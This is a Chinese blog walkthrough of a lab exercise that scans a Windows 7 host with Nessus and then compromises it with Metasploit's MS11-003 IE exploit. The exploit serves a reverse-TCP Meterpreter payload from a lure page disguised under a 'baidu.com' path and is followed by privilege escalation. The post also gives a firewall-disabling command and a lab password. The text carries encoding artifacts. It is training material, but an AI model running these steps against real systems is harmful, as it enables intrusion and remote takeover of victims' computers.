當(dāng)前位置:首頁 > IT技術(shù) > Windows編程 > 正文

Metasploit攻擊win7實(shí)例
2021-10-20 10:41:35

1.查看win7漏洞主機(jī)的登錄用戶及網(wǎng)絡(luò)配置信息,從下圖2可以看出漏洞主機(jī)IP10.1.1.129。使用命令如下:

ipconfig???查看網(wǎng)絡(luò)配置信息

?

?

?

2.為了更好的演示攻擊win7系統(tǒng)實(shí)例需要關(guān)閉win7系統(tǒng)的防火墻,win+R輸入cmd,運(yùn)行“netsh firewall set opmode mode=disable”命令

?

?

?

3.查看攻擊者主機(jī)登陸用戶及網(wǎng)絡(luò)配置信息,從下圖3可以看出攻擊主機(jī)登陸用戶為root ,IP10.1.1.128

whoami????查看當(dāng)前登陸用戶

ifconfig????查看網(wǎng)絡(luò)配置信息

?

?

?

?

?

?

?

  1. Nessus官網(wǎng)下載頁面選擇適合Kali linux的安裝程序。經(jīng)實(shí)驗(yàn)證明多個(gè)版本的都可以在kali linux上安裝成功,這里選擇“Debian 6,7,8,9/Kali Linux 1,2017.3 AMD64”版本程序。下載之后,拷貝到Kali linux主機(jī)上,運(yùn)行下列命令進(jìn)行安裝即可。

?

?

利用Nessus掃描目標(biāo)主機(jī)

執(zhí)行命令 /etc/init.d/nessusd start 啟動(dòng)Nessus服務(wù)

?

?

?

訪問Nessus控制端https://127.0.0.1:8834/。輸入安裝時(shí)設(shè)置的賬號(hào)信息(密碼在桌面nessus文件夾內(nèi))密碼是heetian

?

新建一個(gè)掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。

配置掃描信息,主要設(shè)置掃描名稱、描述和掃描目標(biāo)三個(gè)信息即可,其他配置選擇默認(rèn),配置完成點(diǎn)擊Save選擇對(duì)整個(gè)10.1.1.0/24網(wǎng)段進(jìn)行掃描?選擇別的時(shí)間過長(zhǎng)。

?

?

?

?

重點(diǎn)關(guān)注10.1.1.129主機(jī),即win7靶機(jī),Nessus掃描出該主機(jī)存在四個(gè)最高危漏洞、2個(gè)高危漏洞及其它漏洞問題。

?

?

?

?

?

?

選中高危漏洞,Nessus給出了該漏洞的介紹、風(fēng)險(xiǎn)信息、解決方案等詳細(xì)信息。Risk information對(duì)于攻擊者來說非常有用,可以根據(jù)Risk informationGoogle搜索是否存在已知的漏洞利用Exp。

?

?

?

?

?

?

利用MS11_003 IE漏洞攻擊win7主機(jī)

步驟二中掃描得到win7主機(jī)系統(tǒng)存在MS11_030解析漏洞,但是該漏洞利用條件較為苛刻,因此選擇MS11_003 IE CSS Import漏洞來演示如何通過誘騙攻擊者點(diǎn)擊我們精心構(gòu)造的含有攻擊代碼的網(wǎng)頁來實(shí)現(xiàn)系統(tǒng)入侵。

?

  1. kali執(zhí)行“msfconsole”,啟動(dòng)metasploit

?

?

?

  1. 運(yùn)行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP

?

?

?

?

  1. 運(yùn)行命令:show options,查看配置選項(xiàng)

?

?

?

?

4.設(shè)置生成的惡意網(wǎng)頁的URIbaidu.com

運(yùn)行命令:set URIPATH baidu.com

5.為防止服務(wù)器端口沖突,設(shè)置服務(wù)器端口為8060,避開常用端口8080

運(yùn)行命令:set SRVPORT 8060

6.設(shè)置攻擊負(fù)載

運(yùn)行命令:set PAYLOAD windows/meterpreter/reverse_tcp

?

?

?

?

7.查看配置選項(xiàng)

運(yùn)行命令: show options

?

8.設(shè)置LHOST以綁定本地IP

set LHOST 10.1.1.128

?http://10.1.1.128:8060/baidu.com

?

9.為避免沖突設(shè)置LPORT

運(yùn)行命令:set LPORT 8866

?

10.運(yùn)行命令“exploit”開始進(jìn)行攻擊,生成惡意網(wǎng)頁和做好其他準(zhǔn)備,只等受害者訪問我們構(gòu)造的惡意網(wǎng)頁

?

?

?

11.Win7靶機(jī)打開IE,訪問http://10.1.1.128:8060/baidu.com,模擬受害者誤點(diǎn)擊網(wǎng)頁,靶機(jī)IE如下圖所示,攻擊者Metasploit顯示如下圖所示信息表明攻擊成功。

?

?

?

?

?

?

12.驗(yàn)證攻擊是否成功。列出當(dāng)前成功建立的回話,任意進(jìn)入一個(gè)回話,查看攻擊者的身份??梢試L試使用getsystem進(jìn)行進(jìn)一步的提權(quán),如果提權(quán)失敗則可以采取上傳提權(quán)exe程序進(jìn)行提權(quán)的方案獲得最高權(quán)限。

sessions???列出所有會(huì)話

sessions -i 1???進(jìn)入1號(hào)會(huì)話

getuid???查看當(dāng)前用戶

?

?

?

?

?

?

?

?

四、思考與補(bǔ)充

1.?使用Armitage攻擊目標(biāo)主機(jī)。

這種方法一般會(huì)經(jīng)歷目標(biāo)網(wǎng)絡(luò)掃描、目標(biāo)主機(jī)信息搜集、目標(biāo)主機(jī)攻擊模塊搜索三個(gè)階段。目標(biāo)網(wǎng)絡(luò)掃描是為了確定目標(biāo)主機(jī)所在網(wǎng)絡(luò)結(jié)構(gòu)的網(wǎng)絡(luò)拓?fù)?,為后續(xù)目標(biāo)主機(jī)信息搜索和攻擊奠定基礎(chǔ)。目標(biāo)主機(jī)信息搜索是為了收集目標(biāo)主機(jī)的漏洞信息,根據(jù)收集到的漏洞信息可以利用Armitage在Metasploit中自動(dòng)搜索合適的攻擊模塊。目標(biāo)主機(jī)攻擊模塊搜索主要方法是依據(jù)發(fā)現(xiàn)的漏洞信息尋找可以突破目標(biāo)系統(tǒng)的現(xiàn)有漏洞利用模塊,為具體的攻擊方案制定提供盡可能多的可靠支撐。

五、思考與總結(jié)

通過這個(gè)實(shí)驗(yàn),可以了解到Nessus漏洞掃描工具的一些基礎(chǔ)功能,還可以掌握如何掃描主機(jī)漏洞,利用Nessus篩選合適的Metasploit攻擊模塊進(jìn)行安全測(cè)試。

?

本文摘自 :https://www.cnblogs.com/

開通會(huì)員,享受整站包年服務(wù)立即開通 >